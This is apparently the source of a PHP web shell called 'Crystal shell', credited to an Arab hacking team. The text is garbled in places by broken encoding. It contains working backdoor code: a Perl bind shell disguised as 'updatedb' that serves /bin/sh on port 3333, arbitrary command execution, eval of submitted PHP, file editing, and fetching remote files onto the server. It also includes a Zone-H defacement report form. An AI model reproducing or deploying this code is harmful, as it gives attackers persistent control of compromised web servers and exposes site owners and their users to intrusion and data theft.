    C?C?C?? E???? ?I E?E?? EC?I?C?<br>Comma nd </a>.</b>";} ?> <? if ($act == "bind") {echo "<center><b>CRYSTAL-H:<br><br>-Connect ?? EC??U? ??? I?C?.<br>.E?I ?C?E? C??C? C?????EE EC????I<br>.-&Eci rc;??? ?CICE C??E ?CE ?E??E ???<br>nc -lp 3333E?ECEE C????? <br>C?????E&Ecir c; E?UE C?E??? <br>Bind port to :<br> bind shell ?????C ? ?? </a>.</b>";} ?> <? if ($act == "about") {echo "<center><b>C????& Ograve;CE:<br><br>??C?E C????CE ?? C???? C?A??.<br>.?C??E ????? EC?C?C?? C???C?I? ?????? C?E???<br>.-?&aeli g;E ?? E???? ?C?OC? ???? C????CE E?? ?????<br>E?? ????? Defacer Zone-h CO?? CIE?C?? EC?C??C? ?E? I?C? - <br> E???E ?E???? <br>??E? ????EC? :<br> C????C? : C?????E C???E?E C????I?E<br>

    ;ooloo605@hotmail.com </a>.</b>";} ?> </tr> </table> <b> <p align="center"> <font face="Verdana" size="-2"></b><b> <a href="?act=Defacer">Defacer Zone-H</a></font><p align="center">&nbsp; <? if ($act == "Defacer") {echo "<center><b>CRYSTAL-H:<br><br>C&Oa cute;? C????? Defacer<br>C????? C??IE?? Victim<br>??? C?CIE?C? C? ??? C?EU?? C?E? C?EE??E?C Attack Mode <br> ?EE C?CIE?C? Attack Reason <br>?C??C? C?CIE?C? sand <br> ????? CI? C?E????CE C?????? EC????? Attacks On Hold</a>.</b>";} ?><FORM name=notifyForm action=http://www.zone-h.org/component/option,com_notify/Itemid,89/tas k,single/ method=post> <TABLE class=contentpane cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <!-- DESCRIPTION --> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"></TD></TR><!-- INSTRUCTIONS --> </TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=10 width="100%" border=0 style="color: #CC0000; border: 1px outset #000000; background-color: #000000"> <TBODY> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD align=left style="color: #DCE7EF; border: 1px solid #FFFFFF; background-color: #000000" bgcolor="#000000" bordercolorlight="#000000"

    bordercolordark="#000000"> <TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE"> <TBODY> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000" align=left><SPAN style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY&g t;</TABLE><!-- Input Form --> <TABLE class=notifyForm width="100%"> <TBODY> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD noWrap align=left width="15%" height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"><b><font size="1" color="#FF0000"> ::Defacer::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1"></font></TD> <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <INPUT class=inputbox id=defacer style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" maxLength=64 name=defacer size="1" value="Super-Crystal"> </font></font> </font></TD> <font size=-2 face=verdana color=white> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <b><font size="1" color="#FF0000">::Victim::</font></b>:<fon t size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1"></font></TD> <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <INPUT class=inputbox id=domain style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" maxLength=250

    value=http://www.microsoft.com name=domain size="1"> </TD> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <b> <font color="#FF0000" size="1">Attack Mode</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1"></font></TD> <TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <SELECT class=inputbox style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=method size="1"> <OPTION value="" selected>choose</OPTION> <OPTION value=23>Access credentials through Man In the Middle attack</OPTION><OPTION value=22>Attack against the administrator/user (password stealing/sniffing)</OPTION><OPTION value=29>DNS attack through cache poisoning</OPTION><OPTION value=28>DNS attack through social engineering</OPTION><OPTION value=17> File Inclusion</OPTION><OPTION value=9>FTP Server intrusion</OPTION><OPTION value=8>Mail Server intrusion</OPTION><OPTION value=30>Not available</OPTION><OPTION value=14> Other Server intrusion</OPTION><OPTION value=18> Other Web Application bug</OPTION><OPTION value=19> Remote administrative panel access through bruteforcing</OPTION><OPTION value=20>Remote administrative panel access through password guessing</OPTION><OPTION value=21>Remote administrative panel access through social engineering</OPTION><OPTION value=25>Remote service password bruteforce</OPTION><OPTION value=24>Remote service password guessing</OPTION><OPTION value=26> Rerouting after attacking the Firewall</OPTION><OPTION value=27>Rerouting after attacking the Router</OPTION><OPTION value=12> RPC Server intrusion</OPTION><OPTION value=13>Shares misconfiguration</OPTION><OPTION value=15>SQL Injection</OPTION><OPTION value=10>SSH Server intrusion</OPTION><OPTION value=11>Telnet Server intrusion</OPTION><OPTION value=16>URL Poisoning</OPTION><OPTION value=7> Web Server external module intrusion</OPTION><OPTION

    value=6>Web Server intrusion</OPTION></SELECT></TD></TR> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <b> <font size="1" color="#FF0000">Attack Reason</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1"></font></TD> <TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"> <SELECT class=inputbox style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=reason size="1"> <OPTION value="" selected>choose</OPTION> <OPTION value=4>As a challenge</OPTION><OPTION value=1>Heh...just for fun!</OPTION><OPTION value=5>I just want to be the best defacer</OPTION><OPTION value=7> Not available</OPTION><OPTION value=6>Patriotism</OPTION><OPTION value=3>Political reasons</OPTION><OPTION value=2>Revenge against that website</OPTION></SELECT></TD></TR></TBODY& gt;</TABLE> <TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE"> <TBODY> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"> <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000" align=left><SPAN style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY&g t;</TABLE> <DIV style="CLEAR: both"></DIV> <TABLE class=notifyForm width="100%"> <TBODY> <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">

    <TD align=left style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa" bgcolor="#000000"> <INPUT class=button onclick=validate() type=button value=Send name=send style="color: #CC0000; border: 1px solid #C0C0C0; background-color: #EEEEEE">&nbsp;&nbsp;<b><font size=4 face="Wingdings 3">:</font></b>&nbsp;&nbsp; </font></font> <font size=6 face=Webdings color="#FF0000">L </font><b> <a class="sublevel" href="http://www.zone-h.org/component/option,com_attacks/Itemid,4 5/"> <font color="#FF0000">Attacks On Hold</font></a></b><font color="#FF0000"> </font> <font size=6 face=Webdings color="#FF0000">L</TD></TR></TBODY>< /TABLE> <INPUT type=hidden value=com_notify name=option style="font-family: Verdana; font-size: 10px; color: black; border: 2px solid black; background-color: #C0C0C0"> </TR></TBODY></TABLE></FORM></font><? if ($act == "team") {echo "<center><b>Arab Security Center Team<br><br>Super-Crystal<br>Medo-HaCKer<br>An aconda<br>Alsb0r<br> ReeM-HaCK <br>NoOFa <br> AL-Alame<br>The YounG HackeR<br>Anti-Hack </a>.</b>";} ?></b><br> <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr> <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center"> <b> &nbsp;</b><font face="Wingdings 3" size="5">y</font>Crystal shell v. 1 beta<b>&nbsp; </b> <a bookmark="minipanel"><b> <a href="?act=about"><u> powered by</u></a></b></a><font color="#CC0000"><span lang="en-us">l </span> Super-Crystal</font> <a href="?act=team">Arab Security Center Team</a><b> </b><a href="http://www.secure4center.com"><font color="#DCE7EF">securityCenter</font></a>< b> : </b> Web<b> </b>

    <font face="Wingdings 3" size="5">x</font></p> <p align="center">&nbsp;</p></td></tr> </table> <p align="center">&nbsp;</p> </body></html> /* --------- ---------/* /* /* /* /* Coded by : Super-Crystal --=SAUDI ARABIC=------------------------------------------------Arab Security Center Team <---thanks mail : sup3r-hackers@hotmail.Com

    /* october73 shell & CrystalShell < coding by super crystal /* /*********************************************************/ ?> <?$dir=realpath("./")."/"; $dir=str_replace("\\","/",$dir); ?> <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title> Crystal shell</title> <style> td { font-family: verdana, arial, ms sans serif, sans-serif; font-size: 11px; color: #D5ECF9; } BODY { margin-top: 4px; margin-right: 4px; margin-bottom: 4px; margin-left: 4px; scrollbar-face-color: #b6b5b5; scrollbar-highlight-color: #758393; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #101842; scrollbar-shadow-color: #ffffff; scrollbar-arrow-color: #000000; scrollbar-track-color: #ffffff; } A:link {COLOR:blue; TEXT-DECORATION: none} A:visited { COLOR:blue; TEXT-DECORATION: none} A:active {COLOR:blue; TEXT-DECORATION: none} A:hover {color:red;TEXT-DECORATION: none} input, textarea, select { background-color: #EBEAEA; border-style: solid; border-width: 1px; font-family: verdana, arial, sans-serif; font-size: 11px;

    color: #333333; padding: 0px; } </style></head> <BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF"> <center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr> <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000"> <p align="center">&nbsp;</p> <p align="center"> <a bookmark="minipanel"> <font face="Webdings" size="7" color="#DCE7EF">?</font></a><font size="7" face="Martina">CRYSTAL-H</font><span lang="en-us"><font size="3" face="Martina"> </font> <font size="1" face="Arial">Crystal hack shellphp</font></span><font color="#FFFF00" face="Arial" size="1">&nbsp;<span lang="en-us">2006-2007</span></font></p> ; </p> <a bookmark="minipanel"> <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr> <p align="center"> <b> <? $dirfile="$file_to_download"; if (file_exists("$dirfile")) { header("location: $dirfile"); } if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "<font color=\"red\">ON (secure)</font>"; } // PHPINFO if ($_GET['action'] == "phpinfo") { echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() b&#7883; c&#7845;m"; exit; }

    else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";} echo("Safe-mode: $hsafemode"); $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";} else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";} echo("<br>"); echo("Open base dir: $hopenbasedir"); echo("<br>"); echo "PostgreSQL: <b>"; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo("<br>"); echo "MSSQL: <b>"; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo("<br>"); echo "MySQL: <b>"; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } echo("<br>"); echo "PHP version: <b>".@phpversion()."</b>"; echo("<br>"); echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><fo nt color=red>OFF</font></b>")); echo("<br>"); echo "Disable functions : <b>"; if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); ?> </b></p> <p align="center">&nbsp;</p></td></tr> </table> <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr> <b>

    </b></p> <p align="center">&nbsp;</p></td></tr> </table> </a>

    </p> <p align="center"><font color="#FFFF00">&nbsp;</font></p> <p align="center"></p> </th></tr><tr> <td bgcolor="#000000" style="color: #DCE7EF"> <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"> <font size="4px"> <b> <font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial">&nbsp;<?php echo php_uname(); ?>&nbsp;</font></span></font></b><p& gt; <font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial">&nbsp;</font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?>&nbsp;</font></font> </font> </p> </font> <font size=1 face=Verdana> <p><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font> </b> </font> </font> <a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"> <font size=-2 face=verdana color="#FFFFFF"> <? passthru("id");?></font><font size=-2 face=verdana color="black"><br> </font> <font size=-2 face=Verdana color="#DCE7EF"> pwd</font><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF"> <? echo

    getcwd();?></div></font></font></a></fon t></b></a></font><br><br>&nbsp;&l t;font size="4px"><b><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color="#FF0000" face="Verdana" size="-2"> &nbsp;</font><font size=-2 face=verdana color=white><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">[</font></a></font><font size=-2 face=verdana></a><font face="Verdana" size="-2">&nbsp;</font></font><font size=-2 face=verdana color=white><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="1">Back</font><font color="#DCE7EF" size="1"> </font> </font> <font size="4px"> <a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"> <font color=#DCE7EF size="-2" face="verdana">]</font></a></font></ font><font face=Verdana><font size=-2 face=verdana>&nbsp;</font><font size=-2 face=verdana color=white><font color="#FF0000" face="Verdana" size="-2">&nbsp;</font><font size="4px"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">[ </font> <font size=-2 face=verdana color=white> <a href=?action=phpinfo target=\"_blank\" style="color: white; text-decoration: none"> <font color="#CC0000"> phpinfo</font></a></font></font></font&g t;<font size="4px"><font size=-2 face=verdana> </font> <font color=white size="-2" face="verdana">]</font></font></font>&l t;/b><font size=-2 face=verdana color=white></a><font color="#FF0000" face="Verdana" size="-2">&nbsp;</font></font><b>&l t;font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">[ </font> <a href="?act=tools"><span lang="en-us"><font color=#CC0000 size="-2">Tools</font></span></a></a ></font></b></font><b><font face=Verdana

    size="4px"><font size=-2 face=verdana> </font> <font color=white size="-2" face="verdana">]</font></font></b><f ont size="4px"><font size=-2 face=verdana color=white></a><font color="#FF0000" face="Verdana" size="-2">&nbsp;</font></font></font&g t;<font size=-2 face=verdana color=white></a></font><font size="4px"><font size=-2 face=verdana color=white><font color="#FF0000" face="Verdana" size="-2">&nbsp;</font></font></font&g t;<font size=-2 face=verdana color=white></a><span lang="en-us"> </span></font><font size="4px"><font size=-2 face=verdana color=white><font size="4px" face="Verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">[</font></a></font><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font face="Webdings" color="#DCE7EF">j</font></a><font color=#CC0000 face="Verdana" size="-2"> </font> <font size="4px"> <font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"> <font size=-2 face=verdana color=#CC0000>server </font> <font size="1" face="verdana" color="#CC0000">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_NAME; ?> </font></a></font> </a></font> </font><b> <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"> <font color=#DCE7EF size="-2" face="verdana">]&nbsp; </font> <font size=-2 face=verdana color=white> <font size="4px" face="verdana" color="white"> <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"> <font face=Verdana size=-2 color="#008000"> CGI v</font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $GATEWAY_INTERFACE;

    ?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;& nbsp;&nbsp; </font> <font face=Verdana size=-2 color="#008000">&nbsp;HTTP v</font></a></font><font size="1" face="verdana">:</font><font size="4px" face="verdana" color="DCE7EF"><font face=Verdana size=-2> <?php echo $SERVER_PROTOCOL; ?></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font face=Verdana size=-2><font size=-2 face=verdana color=#DCE7EF>&nbsp;</font><font size=-2 face=verdana color=#008000>Mail admin</font></font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADMIN; ?>&nbsp;&nbsp;&nbsp;&nbsp; </font><font face=Verdana size=-2 color="black"> &nbsp; </font></a></font> </font> </b> </font></a>&nbsp;&nbsp;<br> <font size="4px"> <b> <font size=-2 face=verdana color=white> <font face=Verdana size=-2 color="#CC0000"> <a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"> <font face="Wingdings" size="3" color="#000000">:</font></a></font>< font size=-2 face=verdana color=#CC0000>&nbsp;&nbsp;</font><font face="Verdana" size="-2" color="#CC0000">IP</font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px" face="verdana" color="white"><font face=Verdana size=-2> </font><font size="1" face="verdana">&nbsp;</font></font><fo nt size="1" face="verdana" color="#CC0000">SERVER:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADDR; ?> </font> </a> <font size="4px"> </a> <font size=-2 face=verdana color=white> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb sp;&nbsp; </font></font> <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">

    <font size="4px"><font face=Verdana size=-2 color="black">&nbsp;&nbsp;&nbsp;&nbsp;&am p;nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&am p;nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font> <font size="4px" face="verdana" color="white"><font face=Verdana size=-2 color="#008000"> port </font><font size="1" face="verdana" color="#000000">:</font><font face=Verdana size=-2 color="red"> <?php echo $SERVER_PORT; ?> </font></font> </font> </font> </b> </font></p></td></tr></table><br> ; <TABLE style="BORDER-COLLAPSE: collapse; color:#000000" cellSpacing=0 borderColorDark=#DCE7EF cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#C0C0C0 border=1><tr> <td width="100%" valign="top" style="color: #00000" bgcolor="#000000"> <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"> <TABLE style="BORDER-COLLAPSE: collapse; font-family:Verdana; font-size:11px; color:#000000; background-color:#0000000" height=1 cellSpacing=0 borderColorDark=#000000 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#DCE7EF border=1> <tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000"> <td width="990" height="1" valign="top" style="border:1px solid #00000; font-family: Verdana; color: #000000; font-size: 11px; "><p align="center"> &nbsp; </p> <p align="center">&nbsp;<table style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000"> <tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000"> <td style="font-size: 13px; font-family: verdana, arial, helvetica; color: red; background-color: #0000000"> <? if ($act == "tools") echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\"> File to edit: <input type=\"text\" name=\"editfile\" > <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\"> <INPUT type=\"submit\" value=\"Edit\"></form></div>";

    ?> <? if ($act == "tools") echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\"> <table id=tb><tr><td> <INPUT type=\"hidden\" name=\"php\" value=\"yes\"> <INPUT type=\"submit\" value=\"eval code\" id=input></form></div></td></table>"; ?> <? if ($act == "tools") echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\"> <b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"> <b>Port</b><input type=\"text\" name=\"port\" value=\"3333\"> <INPUT type=\"hidden\" name=\"installbind\" value=\"yes\"> <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"> <INPUT type=\"submit\" value=\"Connect\"></form></div>"; ?> <? if ($act == "tools") echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\"> <table id=tb><tr><td>Download here <b>from</b>: <INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\"> <b>into:</b> <INPUT type=\"text\" name=\"fileto\" size=30> <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td> <INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div& gt;"; ?> <? if ($act == "tools") echo " <form action=\"$REQUEST_URI\" method=\"POST\"> <table id=tb><tr><td>??? C?C?C??:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table> "; ?>

    <?php @$dir = $_POST['dir']; $dir = stripslashes($dir); @$cmd = $_POST['cmd']; $cmd = stripslashes($cmd); $REQUEST_URI = $_SERVER['REQUEST_URI']; $dires = ''; $files = '';

    if (isset($_POST['port'])){ $bind = " #!/usr/bin/perl \$port = {$_POST['port']}; \$port = \$ARGV[0] if \$ARGV[0]; exit if fork; $0 = \"updatedb\" . \" \" x100; \$SIG{CHLD} = 'IGNORE'; use Socket; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in(\$port, INADDR_ANY)); listen(S, 50); while(1) { accept(X, S); unless(fork) { open STDIN, \"<&X\"; open STDOUT, \">&X\"; open STDERR, \">&X\"; close X; exec(\"/bin/sh\"); } close X; } ";} function decode($buffer){ return convert_cyr_string ($buffer, 'd', 'w'); }

    function execute($com) { if (!empty($com)) { if(function_exists('exec')) { exec($com,$arr); echo implode('

    ',$arr); } elseif(function_exists('shell_exec')) { echo shell_exec($com); } elseif(function_exists('system')) { echo system($com); } elseif(function_exists('passthru')) { echo passthru($com); } } } function perms($mode) { if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); }

    if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "") { copy($HTTP_POST_FILES["userfile"]["tmp_name"],$H TTP_POST_FILES["userfile"]["name"]); } if((isset($_POST['fileto'])) (isset($_POST['filefrom']))) { $data = implode("", file($_POST['filefrom'])); $fp = fopen($_POST['fileto'], "wb"); fputs($fp, $data); $ok = fclose($fp); if($ok) { $size = filesize($_POST['fileto'])/1024; $sizef = sprintf("%.2f", $size); print "<center><div id=logostrip>Download - OK. (".$sizef."?)</div></center>" ; } else { print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>"; } } if (isset($_POST['installbind'])){ if (is_dir($_POST['installpath']) == true){ chdir($_POST['installpath']); $_POST['installpath'] = "temp.pl";} $fp = fopen($_POST['installpath'], "w"); fwrite($fp, $bind); fclose($fp); exec("perl " . $_POST['installpath']); chdir($dir); } @$ef = stripslashes($_POST['editfile']); if ($ef){ $fp = fopen($ef, "r"); $filearr = file($ef);

    $string = '';

    $content = ''; foreach ($filearr as $string){ $string = str_replace("<" , "&lt;" , $string); $string = str_replace(">" , "&gt;" , $string); $content = $content . $string; } echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea> <input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\"> <input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br> <input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>"; fclose($fp); } if(isset($_POST['savefile'])){ $fp = fopen($_POST['savefile'], "w"); $content = stripslashes($content); fwrite($fp, $content); fclose($fp); echo "<center><div id=logostrip>saved -OK!</div></center>"; } if (isset($_POST['php'])){ echo "<center><div id=logostrip>eval code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br> <input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>"; }

    if(isset($_POST['phpcode'])){ echo "<center><div id=logostrip>Results of PHP execution<br><br>"; @eval(stripslashes($_POST['phpcode'])); echo "</div></center>"; } if ($cmd){

    if($sertype == "winda"){ ob_start(); execute($cmd); $buffer = ""; $buffer = ob_get_contents(); ob_end_clean(); } else{ ob_start(); echo decode(execute($cmd)); $buffer = ""; $buffer = ob_get_contents(); ob_end_clean(); } if (trim($buffer)){ echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>"; echo decode($buffer); echo "</textarea></center></div>"; } } $arr = array(); $arr = array_merge($arr, glob("*")); $arr = array_merge($arr, glob(".*")); $arr = array_merge($arr, glob("*.*")); $arr = array_unique($arr); sort($arr); echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td>< ;td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>"; foreach ($arr as $filename) { if ($filename != "." and $filename != ".."){ if (is_dir($filename) == true){ $directory = ""; $directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . 